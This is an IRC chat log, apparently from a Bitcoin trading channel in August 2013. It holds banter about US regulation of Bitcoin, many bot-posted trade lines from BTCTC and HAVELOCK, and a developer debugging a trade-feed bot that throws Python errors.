Aug 14 23:33:35 he's my source on amir taaki Aug 14 23:33:36 own something Aug 14 23:33:48 No, he's the resident troll. Super Kami Guru allows it. Aug 14 23:33:51 dub: you do realize we're talking about american regulators in the USA, right? Aug 14 23:34:15 I dont give a fuck what happens in other countries, thats their potential revolution, not mine Aug 14 23:34:51 perfectly american attitude Aug 14 23:35:05 and, the reason for your butthurt Aug 14 23:35:22 he's butthurt ?! Aug 14 23:35:36 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 14 23:35:42 Im butthurt?! Aug 14 23:35:44 yeah he doesnt like that his govt wants to regulate something he feels is already regulated Aug 14 23:35:57 i thought he had a pretty decenty point : bitcoin is the most regulated currency in history, because new issuance happens accoerding to strict rules. Aug 14 23:35:59 welcome to the rest of the world Aug 14 23:36:06 No, Im saying theres nothing TO regulate because it IS regulated Aug 14 23:36:10 unlike gold which is randsom and paper which is polirtical Aug 14 23:36:21 the regulators arent even posturing because of politics Aug 14 23:36:28 yeah but you can apply the same to drugs, terrorism etc Aug 14 23:36:32 its just the media printing articles with no basis Aug 14 23:36:45 which is what I originally bitched about Aug 14 23:36:45 you don't mind when they try to regualte that Aug 14 23:36:51 no one in the government gives a fuck about bitcoin Aug 14 23:36:58 its a tiny little project that never got anywhere Aug 14 23:37:16 more money changes hands in the illegal wow gold trade every day than bitcoin Aug 14 23:37:23 Diablo-D3 nope, thats not true. Aug 14 23:37:41 mircea_popescu: you underestimate the koreans Aug 14 23:37:58 maybe i do Aug 14 23:38:17 Sorry to interrupt this thrilling discussion, but I couldn't help but notice that no one has said the word "butthurt Aug 14 23:38:19 " Aug 14 23:38:26 in the last few minutes. Aug 14 23:38:33 Could we toss that in here soon? Thanks. Aug 14 23:39:11 .d Aug 14 23:39:12 50810339.04828 | Next Diff in 1843 blocks | Estimated Change: 10.0392% in 11d 12h 1m 41s Aug 14 23:39:18 hm wtf was it Aug 14 23:39:23 ;;echo .bait Aug 14 23:39:23 .bait Aug 14 23:39:27 http://31.media.tumblr.com/tumblr_m504qkqb6U1qfep67o1_500.gif Aug 14 23:40:00 nice ai you got in ozbot Scrat. soon to be hurt butt. Aug 14 23:40:11 I think Diablo-D3 is just a butthurt narcoterrorist Aug 14 23:40:20 there you go ken Aug 14 23:40:24 DING DING DING Aug 14 23:41:18 dub is the "Butthurt King" Aug 14 23:41:25 [HAVELOCK] [VTX] 2 @ 0.6300001 = 1.26 BTC [+] Aug 14 23:41:57 must be a strange new world for you Aug 14 23:41:57 It's a Brave New World, actually. Aug 14 23:42:00 I wonder if dub knows what butthurt means Aug 14 23:42:33 wait, it means something ?! Aug 14 23:42:38 why would I be butthurt because the mass media keeps printing articles proving they know nothing about bitcoin and nothing about financial regulation Aug 14 23:43:25 [BTCTC] [DMS.PURCHASE] 885 @ 0.02079 = 18.3992 BTC [+] Aug 14 23:45:02 [BTCTC] [DMS.SELLING] 25 @ 0.01828 = 0.457 BTC [-] Aug 14 23:45:39 [HAVELOCK] [AM100] 4 @ 0.03879998 = 0.1552 BTC [-] Aug 14 23:46:56 because I have half a million lollipops probably Aug 14 23:47:36 [BTCTC] [ASICMINER-PT] 20 @ 3.9 = 78 BTC [-] Aug 14 23:48:02 [HAVELOCK] [XBOND] 7 @ 0.001046 = 0.0073 BTC [-] Aug 14 23:48:19 [HAVELOCK] [VTX] 2 @ 0.6300001 = 1.26 BTC [+] Aug 14 23:50:00 https://btcglobal.net/blog/post/more-bitcoin-regulation-a-sign-of-currencys-success Aug 14 23:50:07 More Bitcoin regulation a Sign of currency's success | BTC Global S.A. Aug 14 23:50:38 [BTCTC] [DMS.PURCHASE] 385 @ 0.02079 = 8.0042 BTC [+] Aug 14 23:50:39 [BTCTC] [ASICMINER-PT] 1 @ 3.962 BTC [+] Aug 14 23:52:10 "An ever larger magnifying glass is being used to scrutinize Bitcoin" Aug 14 23:52:15 so retarded Aug 14 23:52:38 next article will be an even more larger magnifying glass? Aug 14 23:53:08 no, microscope :D Aug 14 23:53:27 ThickAsThieves there's a dearth of bloggers covering btc anyway. Aug 14 23:53:31 [HAVELOCK] [LABCO] 2 @ 0.00179995 = 0.0036 BTC [+] Aug 14 23:53:33 seems people can't fucking write anymore ;/ Aug 14 23:53:38 telescope? Aug 14 23:53:51 smoke and mirrors Aug 14 23:53:53 [BTCTC] [ACTIVEMINING] 2 @ 0.005421 = 0.0108 BTC [+] Aug 14 23:53:55 [HAVELOCK] [HIM] 2 @ 0.222 = 0.444 BTC [-] Aug 14 23:55:11 [HAVELOCK] [XBOND] 1 @ 0.0010461 BTC [+] Aug 14 23:55:13 [BTCTC] [DMS.MINING] 385 @ 0.0027 = 1.0395 BTC [-] Aug 14 23:55:21 [HAVELOCK] [XBOND] 130 @ 0.0010461 = 0.136 BTC [+] Aug 14 23:55:41 [BTCTC] [DMS.PURCHASE] 50 @ 0.02079 = 1.0395 BTC [+] Aug 14 23:57:31 [BTCTC] [DMS.MINING] 1 @ 0.0027 BTC [-] Aug 14 23:57:45 [BTCTC] [DMS.MINING] 7 @ 0.002798 = 0.0196 BTC [+] Aug 14 23:57:58 [HAVELOCK] [HIM] 1 @ 0.222 BTC [-] Aug 15 00:01:33 mircea_popescu , have you checked out Star Citizen for the same idea as EVE? Aug 15 00:01:42 corp idea Aug 15 00:01:54 nope Aug 15 00:02:17 [HAVELOCK] [XBOND] 5 @ 0.0010498 = 0.0052 BTC [+] Aug 15 00:02:19 I think that would be a entry into the next EVE, at a early stage Aug 15 00:02:32 im not much for sci fi games usually so i didn't even know that existed Aug 15 00:02:39 but if you're playing it maybe you should make a corp Aug 15 00:02:46 It is not out yet Aug 15 00:02:58 [BTCTC] [LABCOIN] 2 @ 0.001587 = 0.0032 BTC [+] Aug 15 00:03:03 It is still under development Aug 15 00:03:12 a Aug 15 00:03:45 Dogfighting opens in a couple months if I remember right Aug 15 00:03:49 https://bitcointalk.org/index.php?topic=273808.0 Aug 15 00:03:54 btc-bond pays divs? Aug 15 00:03:55 Donate shares to Charity on BTCT Aug 15 00:04:39 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 15 00:04:42 [BTCTC] [ASICMINER-PT] 1 @ 3.999 BTC [+] Aug 15 00:06:44 [BTCTC] [S.MPOE-PT] 5 @ 0.00096 = 0.0048 BTC [+] Aug 15 00:08:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00102 BTC [-] Aug 15 00:09:11 [HAVELOCK] [XBOND] 1 @ 0.0010461 BTC [-] Aug 15 00:10:59 [BTCTC] [LABCOIN] 6 @ 0.001599 = 0.0096 BTC [+] Aug 15 00:12:46 [BTCTC] [DMS.MINING] 49 @ 0.002701 = 0.1323 BTC [-] Aug 15 00:13:19 [BTCTC] [DMS.PURCHASE] 5 @ 0.02079 = 0.104 BTC [+] Aug 15 00:17:51 [BTCTC] [DMS.MINING] 5 @ 0.002701 = 0.0135 BTC [-] Aug 15 00:22:11 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 15 00:24:31 [BTCTC] [DMS.SELLING] 38 @ 0.01834 = 0.6969 BTC [+] Aug 15 00:25:40 [BTCTC] [DMS.MINING] 200 @ 0.002701 = 0.5402 BTC [-] Aug 15 00:28:47 [BTCTC] [ASICMINER-PT] 1 @ 3.96 BTC [-] Aug 15 00:30:27 [HAVELOCK] [AM1] 1 @ 4.078 BTC [+] Aug 15 00:32:53 [BTCTC] [DMS.SELLING] 9 @ 0.01829 = 0.1646 BTC [-] Aug 15 00:34:10 [HAVELOCK] [XBOND] 342 @ 0.0010479 = 0.3584 BTC [+] Aug 15 00:34:17 [HAVELOCK] [XBOND] 342 @ 0.001046 = 0.3577 BTC [-] Aug 15 00:34:25 [BTCTC] [DMS.MINING] 70 @ 0.002701 = 0.1891 BTC [-] Aug 15 00:34:39 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 15 00:36:47 [BTCTC] [DMS.MINING] 10 @ 0.002701 = 0.027 BTC [-] Aug 15 00:37:53 [BTCTC] [DMS.MINING] 20 @ 0.002749 = 0.055 BTC [+] Aug 15 00:41:48 [BTCTC] [DMS.MINING] 12 @ 0.002749 = 0.033 BTC [+] Aug 15 00:43:03 [BTCTC] [ACTIVEMINING] 1 @ 0.005301 BTC [-] Aug 15 00:43:10 [BTCTC] [ACTIVEMINING] 30 @ 0.005301 = 0.159 BTC [-] Aug 15 00:43:24 ;;nethash Aug 15 00:43:25 399485.88969 Aug 15 00:44:12 [BTCTC] [ACTIVEMINING] 13 @ 0.0053 = 0.0689 BTC [-] Aug 15 00:44:35 [BTCTC] [DMS.MINING] 33 @ 0.002749 = 0.0907 BTC [+] Aug 15 00:46:09 [BTCTC] [ACTIVEMINING] 13 @ 0.0053 = 0.0689 BTC [-] Aug 15 00:46:38 [BTCTC] [ACTIVEMINING] 18 @ 0.005301 = 0.0954 BTC [+] Aug 15 00:48:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.0394 = 0.1576 BTC [+] Aug 15 00:48:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.0394 = 0.2364 BTC [+] Aug 15 00:48:14 [BTCTC] [ACTIVEMINING] 10 @ 0.0053 = 0.053 BTC [-] Aug 15 00:48:43 [HAVELOCK] [SDSTM] 3 @ 0.0061 = 0.0183 BTC [+] Aug 15 00:50:12 [BTCTC] [ACTIVEMINING] 10 @ 0.0053 = 0.053 BTC [-] Aug 15 00:51:17 [BTCTC] [DMS.MINING] 2 @ 0.002749 = 0.0055 BTC [+] Aug 15 00:52:09 [BTCTC] [ACTIVEMINING] 10 @ 0.0053 = 0.053 BTC [-] Aug 15 00:54:11 [BTCTC] [ACTIVEMINING] 10 @ 0.0053 = 0.053 BTC [-] Aug 15 00:55:51 [BTCTC] [LTC-ATF.B2] 121 @ 0.01043 = 1.262 BTC [+] Aug 15 00:55:52 [BTCTC] [LTC-ATF.B2] 150 @ 0.01043 = 1.5645 BTC [+] Aug 15 00:55:53 [BTCTC] [LTC-ATF.B2] 38 @ 0.01043 = 0.3963 BTC [+] Aug 15 00:56:08 [BTCTC] [TAT.VIRTUALMINE] 247 @ 0.00101 = 0.2495 BTC [-] Aug 15 00:56:11 [BTCTC] [ACTIVEMINING] 10 @ 0.0053 = 0.053 BTC [-] Aug 15 00:56:45 [BTCTC] [TAT.VIRTUALMINE] 109 @ 0.00102 = 0.1112 BTC [+] Aug 15 00:56:47 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001044 = 0.1044 BTC [+] Aug 15 00:56:48 [BTCTC] [TAT.VIRTUALMINE] 400 @ 0.001045 = 0.418 BTC [+] Aug 15 00:56:49 [BTCTC] [TAT.VIRTUALMINE] 400 @ 0.001045 = 0.418 BTC [+] Aug 15 00:56:50 [BTCTC] [TAT.VIRTUALMINE] 400 @ 0.001046 = 0.4184 BTC [+] Aug 15 00:56:50 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.001047 = 0.3141 BTC [+] Aug 15 00:56:51 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001048 = 0.1048 BTC [+] Aug 15 00:56:52 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.001048 = 0.3144 BTC [+] Aug 15 00:56:54 [BTCTC] [TAT.VIRTUALMINE] 1021 @ 0.001049 = 1.071 BTC [+] Aug 15 00:56:55 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.001049 = 1.049 BTC [+] Aug 15 00:56:56 [BTCTC] [TAT.VIRTUALMINE] 103 @ 0.00105 = 0.1082 BTC [+] Aug 15 00:56:57 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00105 = 0.525 BTC [+] Aug 15 00:57:08 heh Aug 15 00:57:14 [BTCTC] [DMS.MINING] 10 @ 0.002749 = 0.0275 BTC [+] Aug 15 00:58:10 [BTCTC] [ACTIVEMINING] 4 @ 0.0053 = 0.0212 BTC [-] Aug 15 00:59:05 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.001099 = 0.0077 BTC [+] Aug 15 00:59:07 [BTCTC] [TAT.VIRTUALMINE] 1499 @ 0.0011 = 1.6489 BTC [+] Aug 15 00:59:07 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00112 = 0.112 BTC [+] Aug 15 00:59:08 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00114 = 0.228 BTC [+] Aug 15 00:59:09 [BTCTC] [TAT.VIRTUALMINE] 29 @ 0.001146 = 0.0332 BTC [+] Aug 15 00:59:44 [BTCTC] [TAT.VIRTUALMINE] 71 @ 0.001146 = 0.0814 BTC [+] Aug 15 00:59:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0012 BTC [+] Aug 15 00:59:47 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.001267 = 0.0557 BTC [+] Aug 15 00:59:48 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.001281 = 0.0512 BTC [+] Aug 15 01:00:19 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.001282 = 0.0962 BTC [+] Aug 15 01:03:11 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [-] Aug 15 01:03:24 [BTCTC] [LABCOIN] 1 @ 0.001598 BTC [-] Aug 15 01:04:43 [BTCTC] [DMS.MINING] 5 @ 0.002749 = 0.0137 BTC [+] Aug 15 01:04:57 [BTCTC] [TAT.MINIGAME] 4 @ 0.000234 = 0.0009 BTC [+] Aug 15 01:06:27 [HAVELOCK] [AM1] 1 @ 4 BTC [-] Aug 15 01:06:32 [HAVELOCK] [AM1] 1 @ 3.999 BTC [-] Aug 15 01:07:54 [BTCTC] [TAT.ASICMINER] 28 @ 0.03935 = 1.1018 BTC [-] Aug 15 01:08:17 [HAVELOCK] [AM100] 1 @ 0.03879997 BTC [-] Aug 15 01:09:33 [BTCTC] [DMS.SELLING] 50 @ 0.01825 = 0.9125 BTC [-] Aug 15 01:10:19 [BTCTC] [DMS.SELLING] 1 @ 0.01825 BTC [-] Aug 15 01:10:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.04005 BTC [+] Aug 15 01:10:55 [BTCTC] [DMS.SELLING] 9 @ 0.01825 = 0.1643 BTC [-] Aug 15 01:11:33 .d Aug 15 01:11:33 50810339.04828 | Next Diff in 1828 blocks | Estimated Change: 11.8005% in 11d 4h 41m 50s Aug 15 01:12:26 [BTCTC] [DMS.PURCHASE] 11 @ 0.02079 = 0.2287 BTC [+] Aug 15 01:12:28 [HAVELOCK] [VTX] 1 @ 0.63399 BTC [+] Aug 15 01:12:30 [HAVELOCK] [VTX] 10 @ 0.634 = 6.34 BTC [+] Aug 15 01:12:31 [HAVELOCK] [VTX] 1 @ 0.6479999 BTC [+] Aug 15 01:12:33 [HAVELOCK] [VTX] 1 @ 0.648 BTC [+] Aug 15 01:12:35 [HAVELOCK] [VTX] 6 @ 0.65 = 3.9 BTC [+] Aug 15 01:12:37 [HAVELOCK] [VTX] 1 @ 0.659 BTC [+] Aug 15 01:12:39 [HAVELOCK] [VTX] 1 @ 0.66 BTC [+] Aug 15 01:12:41 [HAVELOCK] [VTX] 4 @ 0.665 = 2.66 BTC [+] Aug 15 01:14:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001282 BTC [+] Aug 15 01:15:22 [HAVELOCK] [AM100] 3 @ 0.03879997 = 0.1164 BTC [-] Aug 15 01:16:28 [HAVELOCK] [XBOND] 140 @ 0.0010479 = 0.1467 BTC [+] Aug 15 01:17:20 [BTCTC] [DMS.PURCHASE] 5 @ 0.02 = 0.1 BTC [-] Aug 15 01:17:22 [BTCTC] [DMS.PURCHASE] 50 @ 0.02 = 1 BTC [-] Aug 15 01:17:22 [BTCTC] [DMS.PURCHASE] 20 @ 0.02 = 0.4 BTC [-] Aug 15 01:17:51 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.000977 = 0.0127 BTC [-] Aug 15 01:19:19 [BTCTC] [DMS.SELLING] 16 @ 0.0181 = 0.2896 BTC [-] Aug 15 01:19:48 [BTCTC] [DMS.PURCHASE] 10 @ 0.02 = 0.2 BTC [-] Aug 15 01:20:19 [BTCTC] [DMS.MINING] 8 @ 0.002705 = 0.0216 BTC [-] Aug 15 01:20:23 [BTCTC] [DMS.SELLING] 8 @ 0.018 = 0.144 BTC [-] Aug 15 01:20:34 [BTCTC] [LABCOIN] 1 @ 0.001598 BTC [-] Aug 15 01:21:11 [BTCTC] [DMS.MINING] 7 @ 0.002702 = 0.0189 BTC [-] Aug 15 01:21:13 [BTCTC] [DMS.SELLING] 7 @ 0.018 = 0.126 BTC [-] Aug 15 01:21:22 [BTCTC] [DMS.MINING] 12 @ 0.002702 = 0.0324 BTC [-] Aug 15 01:22:09 [BTCTC] [DMS.MINING] 2 @ 0.002702 = 0.0054 BTC [-] Aug 15 01:22:34 [HAVELOCK] [AM100] 114 @ 0.03879997 = 4.4232 BTC [-] Aug 15 01:24:29 [BTCTC] [DMS.SELLING] 2 @ 0.01798 = 0.036 BTC [-] Aug 15 01:24:32 [BTCTC] [DMS.PURCHASE] 600 @ 0.02079 = 12.474 BTC [+] Aug 15 01:24:42 [BTCTC] [DMS.MINING] 3 @ 0.00271 = 0.0081 BTC [+] Aug 15 01:25:07 [HAVELOCK] [XBOND] 15 @ 0.0010479 = 0.0157 BTC [+] Aug 15 01:26:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.04001 = 0.12 BTC [-] Aug 15 01:28:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.04001 = 0.16 BTC [-] Aug 15 01:28:28 [BTCTC] [LABCOIN] 6 @ 0.001599 = 0.0096 BTC [+] Aug 15 01:28:49 [BTCTC] [LABCOIN] 50 @ 0.0016 = 0.08 BTC [+] Aug 15 01:29:27 [BTCTC] [DMS.MINING] 65 @ 0.00271 = 0.1762 BTC [+] Aug 15 01:29:30 [BTCTC] [DMS.MINING] 9 @ 0.00271 = 0.0244 BTC [+] Aug 15 01:29:33 [BTCTC] [ACTIVEMINING] 120 @ 0.0053 = 0.636 BTC [-] Aug 15 01:30:15 [BTCTC] [DMS.PURCHASE] 5 @ 0.02079 = 0.104 BTC [+] Aug 15 01:30:27 [BTCTC] [TAT.ASICMINER] 9 @ 0.04001 = 0.3601 BTC [-] Aug 15 01:30:56 [BTCTC] [DMS.MINING] 21 @ 0.00271 = 0.0569 BTC [+] Aug 15 01:31:29 [BTCTC] [DMS.MINING] 600 @ 0.00271 = 1.626 BTC [+] Aug 15 01:31:32 [BTCTC] [DMS.MINING] 1 @ 0.00271 BTC [+] Aug 15 01:32:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.04034 BTC [+] Aug 15 01:32:53 [BTCTC] [DMS.PURCHASE] 300 @ 0.02079 = 6.237 BTC [+] Aug 15 01:32:56 [HAVELOCK] [XBOND] 16 @ 0.0010479 = 0.0168 BTC [+] Aug 15 01:35:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.04034 = 0.0807 BTC [+] Aug 15 01:35:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.04035 = 0.1211 BTC [+] Aug 15 01:36:18 ;;nethash Aug 15 01:36:19 401212.936642 Aug 15 01:36:33 [BTCTC] [ACTIVEMINING] 8 @ 0.005301 = 0.0424 BTC [+] Aug 15 01:37:49 [BTCTC] [W4A-BOOK] 2 @ 0.3 = 0.6 BTC [-] Aug 15 01:37:51 [BTCTC] [W4A-BOOK] 2 @ 0.2428 = 0.4856 BTC [-] Aug 15 01:38:39 [BTCTC] [W4A-BOOK] 1 @ 0.2427 BTC [-] Aug 15 01:38:41 [BTCTC] [W4A-BOOK] 1 @ 0.242 BTC [-] Aug 15 01:39:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.04001 = 0.8002 BTC [-] Aug 15 01:40:28 [BTCTC] [DMS.SELLING] 485 @ 0.01829 = 8.8707 BTC [+] Aug 15 01:40:29 [BTCTC] [DMS.MINING] 7 @ 0.002738 = 0.0192 BTC [+] Aug 15 01:40:52 [BTCTC] [NASTY-PT] 149 @ 0.00435 = 0.6482 BTC [-] Aug 15 01:41:34 [HAVELOCK] [XBOND] 1 @ 0.0010479 BTC [+] Aug 15 01:43:02 [HAVELOCK] [AM100] 1 @ 0.03879998 BTC [+] Aug 15 01:43:05 [BTCTC] [DMS.PURCHASE] 38 @ 0.02079 = 0.79 BTC [+] Aug 15 01:43:22 [BTCTC] [DMS.MINING] 5 @ 0.00271 = 0.0136 BTC [-] Aug 15 01:45:04 [BTCTC] [BFMINES] 1 @ 0.001699 BTC [+] Aug 15 01:45:17 [BTCTC] [BFMINES] 5 @ 0.0017 = 0.0085 BTC [+] Aug 15 01:45:29 [BTCTC] [DMS.MINING] 300 @ 0.00271 = 0.813 BTC [-] Aug 15 01:45:34 [HAVELOCK] [XBOND] 2 @ 0.0010479 = 0.0021 BTC [+] Aug 15 01:45:53 [BTCTC] [BFMINES] 6 @ 0.0018 = 0.0108 BTC [+] Aug 15 01:47:04 Seems like such little activity for your typical Wednesday Aug 15 01:47:34 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.000982 = 0.0982 BTC [+] Aug 15 01:48:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000981 BTC [-] Aug 15 01:48:48 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00098 = 0.002 BTC [-] Aug 15 01:48:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0009737 BTC [-] Aug 15 01:48:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0009702 BTC [-] Aug 15 01:48:51 [BTCTC] [TAT.VIRTUALMINE] 156 @ 0.0009502 = 0.1482 BTC [-] Aug 15 01:50:25 people on holiday? Aug 15 01:51:03 scam break. Aug 15 01:51:52 Expected as much Aug 15 01:52:09 But even am hasn't moved much since earlier today. Aug 15 01:53:03 [HAVELOCK] [VTX] 5 @ 0.6 = 3 BTC [-] Aug 15 01:53:52 why would it? Aug 15 01:54:01 [HAVELOCK] [AM100] 8 @ 0.03879998 = 0.3104 BTC [+] Aug 15 01:54:06 no news and same old dividend Aug 15 01:54:38 Generally am moves a bit after divs come out Aug 15 01:54:57 Or at least that's what I've observed in the past Aug 15 01:55:43 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.0009535 = 0.0124 BTC [+] Aug 15 01:56:05 [BTCTC] [ACTIVEMINING] 5 @ 0.005301 = 0.0265 BTC [+] Aug 15 01:56:40 [BTCTC] [DMS.PURCHASE] 9 @ 0.02079 = 0.1871 BTC [+] Aug 15 01:58:04 [HAVELOCK] [XBOND] 6 @ 0.0010479 = 0.0063 BTC [+] Aug 15 01:59:51 [BTCTC] [ACTIVEMINING] 144 @ 0.0053 = 0.7632 BTC [-] Aug 15 02:02:21 [BTCTC] [TAT.ASICMINER] 16 @ 0.04001 = 0.6402 BTC [-] Aug 15 02:04:37 [BTCTC] [DMS.SELLING] 13 @ 0.0178 = 0.2314 BTC [-] Aug 15 02:05:25 [BTCTC] [DMS.MINING] 9 @ 0.002705 = 0.0243 BTC [-] Aug 15 02:05:28 [BTCTC] [DMS.MINING] 28 @ 0.002738 = 0.0767 BTC [+] Aug 15 02:06:53 AM isnt moving because people are anticipating a large div next week Aug 15 02:07:27 market is saying AM is a hold, and then will probably turn into a buy next week Aug 15 02:07:33 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [+] Aug 15 02:08:22 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 15 02:08:52 [BTCTC] [TAT.ASICMINER] 34 @ 0.04 = 1.36 BTC [-] Aug 15 02:08:53 [BTCTC] [TAT.ASICMINER] 21 @ 0.04 = 0.84 BTC [-] Aug 15 02:09:33 i'd sell about 20mn shares if it actually existed on an actually functioning market where one could do such things. Aug 15 02:09:52 but as that's not the case... well... "the market is saying". Aug 15 02:09:52 [BTCTC] [TAT.ASICMINER] 40 @ 0.04035 = 1.614 BTC [+] Aug 15 02:11:27 [HAVELOCK] [AM100] 1 @ 0.03879998 BTC [+] Aug 15 02:13:46 [HAVELOCK] [AM100] 1 @ 0.0383001 BTC [-] Aug 15 02:14:08 [HAVELOCK] [AM100] 82 @ 0.0383001 = 3.1406 BTC [-] Aug 15 02:14:11 [HAVELOCK] [AM100] 168 @ 0.0383 = 6.4344 BTC [-] Aug 15 02:15:53 [HAVELOCK] [AM1] 1 @ 4.09999999 BTC [+] Aug 15 02:15:56 Makes sense Aug 15 02:18:26 http://trilema.com/2013/the-graduate/ << if anyone's not seen this thing you probably should. Aug 15 02:18:29 The Graduate pe Trilema - Un blog de Mircea Popescu. Aug 15 02:18:30 hoffman kicks ass Aug 15 02:21:48 [HAVELOCK] [AM100] 2 @ 0.0385 = 0.077 BTC [+] Aug 15 02:23:17 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 15 02:23:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.04035 BTC [+] Aug 15 02:24:13 [BTCTC] [ACTIVEMINING] 30 @ 0.005301 = 0.159 BTC [+] Aug 15 02:24:28 [BTCTC] [LABCOIN] 1 @ 0.001639 BTC [+] Aug 15 02:26:04 [HAVELOCK] [XBOND] 12 @ 0.0010479 = 0.0126 BTC [+] Aug 15 02:27:34 [BTCTC] [DMS.SELLING] 13 @ 0.0179 = 0.2327 BTC [+] Aug 15 02:29:22 [BTCTC] [DMS.MINING] 1 @ 0.002738 BTC [+] Aug 15 02:30:37 [HAVELOCK] [XBOND] 3 @ 0.0010479 = 0.0031 BTC [+] Aug 15 02:43:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.04033 = 0.0807 BTC [-] Aug 15 02:51:35 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 15 02:51:35 NameError: global name 'logger' is not defined (file "/app/Coinflow/exchanges/models.py", line 66, in send_to_redis) Aug 15 02:52:29 okay Aug 15 02:52:39 [BTCTC] [LABCOIN] 235 @ 0.001638 = 0.3849 BTC [-] Aug 15 02:52:40 NameError: global name 'logger' is not defined (file "/app/Coinflow/exchanges/models.py", line 66, in send_to_redis) Aug 15 02:52:40 [BTCTC] [LABCOIN] 30 @ 0.001639 = 0.0492 BTC [+] Aug 15 02:52:41 [BTCTC] [LABCOIN] 244 @ 0.00164 = 0.4002 BTC [+] Aug 15 02:52:41 NameError: global name 'logger' is not defined (file "/app/Coinflow/exchanges/models.py", line 66, in send_to_redis) Aug 15 02:52:42 [BTCTC] [LABCOIN] 18 @ 0.001644 = 0.0296 BTC [+] Aug 15 02:52:43 [BTCTC] [LABCOIN] 150 @ 0.001645 = 0.2468 BTC [+] Aug 15 02:52:43 NameError: global name 'logger' is not defined (file "/app/Coinflow/exchanges/models.py", line 66, in send_to_redis) Aug 15 02:52:44 [BTCTC] [LABCOIN] 6 @ 0.001688 = 0.0101 BTC [+] Aug 15 02:52:45 [BTCTC] [LABCOIN] 50 @ 0.001689 = 0.0845 BTC [+] Aug 15 02:52:45 NameError: global name 'logger' is not defined (file "/app/Coinflow/exchanges/models.py", line 66, in send_to_redis) Aug 15 02:52:46 [BTCTC] [LABCOIN] 149 @ 0.00169 = 0.2518 BTC [+] Aug 15 02:52:47 ... Aug 15 02:52:47 [BTCTC] [LABCOIN] 443 @ 0.001691 = 0.7491 BTC [+] Aug 15 02:52:48 [BTCTC] [LABCOIN] 250 @ 0.001692 = 0.423 BTC [+] Aug 15 02:52:48 ... Aug 15 02:52:49 [BTCTC] [LABCOIN] 1000 @ 0.001692 = 1.692 BTC [+] Aug 15 02:52:49 coinflow: pyflakes. use it. Aug 15 02:52:49 [BTCTC] [LABCOIN] 2000 @ 0.001693 = 3.386 BTC [+] Aug 15 02:52:50 ... Aug 15 02:52:50 [BTCTC] [LABCOIN] 125 @ 0.001694 = 0.2118 BTC [+] Aug 15 02:53:01 erg Aug 15 02:53:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04029 BTC [-] Aug 15 02:53:48 [BTCTC] [LABCOIN] 29 @ 0.001693 = 0.0491 BTC [-] Aug 15 02:54:37 coinfail! Aug 15 02:55:29 [BTCTC] [DMS.MINING] 500 @ 0.00271 = 1.355 BTC [-] Aug 15 02:57:17 lol, yeah.. I deserve that for trying to hack at it directly instead of using git-fetch Aug 15 02:58:14 It's supposed to output the debug to a different channel though, hmm Aug 15 02:58:40 [BTCTC] [TAT.ASICMINER] 46 @ 0.04029 = 1.8533 BTC [-] Aug 15 02:58:40 NameError: global name 'json' is not defined (file "/app/Coinflow/exchanges/models.py", line 66, in send_to_redis) Aug 15 02:58:54 damn it Aug 15 02:59:08 [BTCTC] [DMS.SELLING] 100 @ 0.01829 = 1.829 BTC [+] Aug 15 03:00:04 [HAVELOCK] [XBOND] 41 @ 0.0010479 = 0.043 BTC [+] Aug 15 03:00:21 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [-] Aug 15 03:00:47 man the castle is a bitch Aug 15 03:01:06 [BTCTC] [LABCOIN] 235 @ 0.001623 = 0.3814 BTC [-] Aug 15 03:01:07 [BTCTC] [LABCOIN] 19 @ 0.001623 = 0.0308 BTC [-] Aug 15 03:01:21 [BTCTC] [LABCOIN] 37 @ 0.001622 = 0.06 BTC [-] Aug 15 03:01:22 [BTCTC] [LABCOIN] 181 @ 0.001621 = 0.2934 BTC [-] Aug 15 03:01:56 do I need to burn my chocolate bar Aug 15 03:03:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.04029 = 0.3626 BTC [-] Aug 15 03:03:39 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1951 = 0.3902 BTC [-] Aug 15 03:03:43 parseval_: that's why you should use pyflakes! Aug 15 03:03:46 I made it a little prettier http://coinflow.co/livetrades/ Aug 15 03:04:42 I need to add the last 10 trades to start it off with 